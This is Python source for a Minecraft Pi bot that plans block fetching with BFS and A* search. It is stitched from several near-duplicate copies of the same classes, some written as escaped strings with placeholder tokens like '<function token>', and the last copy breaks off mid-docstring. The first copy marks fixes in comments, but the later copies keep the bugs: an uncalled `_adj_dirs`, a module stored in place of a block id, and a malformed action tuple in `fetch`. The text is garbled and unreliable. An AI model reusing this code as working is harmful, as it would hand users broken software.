\"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n 
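# (Editor's note: for/else, comment added in editing -- not original.) The\n # 'else' below fires only when the loop above finished without 'break',\n # i.e. both blocks above the neighbouring column were air or water, so the\n # bot may climb onto that column. Minimal shape of the idiom, for reference:\n # for b in column: (break on obstruction)\n # else: (path is clear)\n 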
else:
                rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,
                    0),)})
        for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:
            if self._get_block(base_pos + vert_dir) not in empty_blocks:
                break
        else:
            pos = base_pos + _Vec3(0, -1, 0)
            for _ in xrange(_DROP_PLUS_1):
                block_ = self._get_block(pos)
                if block_ != _AIR:
                    if block_ != _LAVA:
                        rtn.append({'func': '_move', 'args': (pos + _Vec3(0,
                            1, 0),)})
                    break
                pos.y -= 1
        # Fixed: return the collected side moves; callers extend() with this
        # list, so falling off the end (returning None) would raise.
        return rtn

    def _surrounded(self):
        """Return whether or not the bot is surrounded by water."""
        for dir_ in _adj_dirs():
            if self._get_block(self._pos + dir_) != _WATER:
                return False
        return True

    def _get_mine_actions(self):
        """Return a list of legal mining actions (that only involve mining
        and not moving)."""
        rtn = []
        dont_mine = {_AIR, _WATER, _LAVA}
        pos_above = self._pos + _Vec3(0, 2, 0)
        if self._get_block(pos_above) not in dont_mine:
            rtn.append({'func': '_mine', 'args': (pos_above,)})
        for dir_ in _adj_dirs():
            pos = self._pos + dir_
            for _ in xrange(2):
                if self._get_block(pos) not in dont_mine:
                    rtn.append({'func': '_mine', 'args': (pos,)})
                pos = pos + _Vec3(0, 1, 0)
        return rtn

    def _get_placement_actions(self, exclude=None):
        """Return a list of legal actions that only involve placing a block
        from the inventory.

        exclude is a block id. It is the block that should not be placed.
        If None, any block can be placed."""
        if not self._has_blocks_to_place(exclude=exclude):
            return []
        dirs = [_Vec3(0, 2, 0)]
        for dir_ in _adj_dirs():
            dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])
            if self._get_block(self._pos + dir_) in [_AIR, _WATER]:
                dirs.append(dir_ + _Vec3(0, -1, 0))
        rtn = []
        for dir_ in dirs:
            pos = self._pos + dir_
            if self._can_place(pos):
                rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {
                    'exclude': exclude}})
        return rtn

    def _can_place(self, loc):
        """Return whether or not the bot can place a block at that location
        independent of what it has in its inventory."""
        non_blocks = [_AIR, _WATER, _LAVA]
        player = [self._pos, self._pos + _Vec3(0, 1, 0)]
        # Fixed: _adj_dirs is a function and must be called before
        # concatenating the vertical directions.
        for dir_ in (_adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):
            new_loc = loc + dir_
            if new_loc not in player and self._get_block(new_loc
                ) not in non_blocks:
                return True
        return False

    def _has_blocks_to_place(self, exclude=None):
        """Return whether or not the bot can place a block from the
        inventory. If exclude is None, any block can be placed."""
        for block_ in self._inventory:
            if block_ != exclude:
                return True
        return False

    def _set_block(self, pos, block_):
        """Set a block. block_ is the block id."""
        raise NotImplementedError

    def _move(self, pos):
        """Move there only."""
        self._pos = deepcopy(pos)


class _ImaginaryBot(_GenericBot):
    """A bot used for finding paths that doesn't actually change blocks
    in the world."""

    def __init__(self, pos, inventory=None):
        """Create a new bot."""
        _GenericBot.__init__(self, pos, inventory)
        self._changes = {}

    def _set_block(self, pos, block_):
        """Set a block. block_ is the block id."""
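        # Design note (added): the imaginary bot buffers edits in
        # self._changes and overlays them in _get_block, so the path search
        # can simulate world changes without touching the real map.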
        # Fixed: record the block id that was passed in (block_), not the
        # imported mcpi block module.
        self._changes[deepcopy(pos)] = block_

    def _get_block(self, pos):
        """Get the block at the position."""
        if pos in self._changes:
            return self._changes[pos]
        else:
            return _get_mc().getBlock(pos)

    def get_block(self, pos):
        """The public version."""
        return self._get_block(pos)

    def __hash__(self):
        """Return the hash."""
        return hash(frozenset([self._pos] + _key_vals(self._inventory) +
            _key_vals(self._changes)))


class Bot(_GenericBot):
    """The real bot.

    All vector arguments are Vec3s."""
    _BOT_BLOCK = block.IRON_BLOCK.id

    def __init__(self):
        """Create a bot next to the player."""
        pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)
        pos = _Vec3(pos.x, pos.y, pos.z)
        _GenericBot.__init__(self, pos)
        self._pos = pos
        self._move(self._pos)

    @staticmethod
    def destroy_all():
        """Destroy all bots within a small distance (in case I forget to
        destroy one)."""
        player_loc = _player_loc()
        minec = _get_mc()
        rad = 10
        for x in xrange(player_loc.x - rad, player_loc.x + rad):
            for y in xrange(player_loc.y - rad, player_loc.y + rad):
                for z in xrange(player_loc.z - rad, player_loc.z + rad):
                    if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:
                        minec.setBlock(x, y, z, _AIR)

    def destroy(self):
        """Set itself to air."""
        self._set_block(self._pos, _AIR)
        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)

    def fetch(self, block_name):
        """Mine and return a block to the player."""
        imag_bot = _ImaginaryBot(self._pos, self._inventory)
        block_id = getattr(block, block_name).id
        block_loc = self._get_block_loc(block_id)
        mine_prob = _MineProblem(imag_bot, block_loc, block_id)
        mine_actions = astar(mine_prob, _mine_heuristic)
        self.take_actions(mine_actions, _DELAY)
        imag_bot = _ImaginaryBot(self._pos, self._inventory)
        player_loc = _player_loc()
        return_prob = _ReturnProblem(imag_bot, block_id, player_loc)
        return_actions = astar(return_prob, _return_heuristic)
        imag_bot.take_actions(return_actions)
        # Fixed: 'args' must be a tuple so take_action can unpack it, and the
        # keyword must match _place's block_ parameter.
        return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos()
            + player_loc) / 2,), 'kwargs': {'block_': block_id}})
        self.take_actions(return_actions, _DELAY)

    def _get_block_loc(self, block_id):
        """Return the location of the block."""
        find_prob = FindProblem(self._pos, block_id)
        dirs = bfs(find_prob)
        return self._pos + sum(dirs)

    def _set_block(self, pos, block_):
        """Place an actual block in the world.

        block_ is a block id."""
        _get_mc().setBlock(pos, block_)

    def _get_block(self, pos):
        """Get the block at the position."""
        return _get_mc().getBlock(pos)

    def _move(self, pos):
        """Move there, and set the appropriate blocks."""
        self._set_block(self._pos, _AIR)
        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
        self._set_block(pos, self._BOT_BLOCK)
        self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)
        self._pos = pos


class FindProblem(SearchProblem):
    """Problem for finding the location of a block in the world.

    A state in this problem is a location.
    """

    def __init__(self, start_loc, block_id):
        """Initialize."""
        self._start_loc = deepcopy(start_loc)
        self._block_id = block_id

    def getStartState(self):
        """Return the starting location."""
        return self._start_loc

    def isGoalState(self, state):
        """Return whether the block at this location is the target."""
        return _get_mc().getBlock(state) == self._block_id

    def getSuccessors(self, state):
        """Return the successors."""
        rtn = []
        for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. 
If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 
1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. 
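The first action runs immediately; the optional pause is inserted only
        between subsequent actions. 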
If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n <function token>\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = 
self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
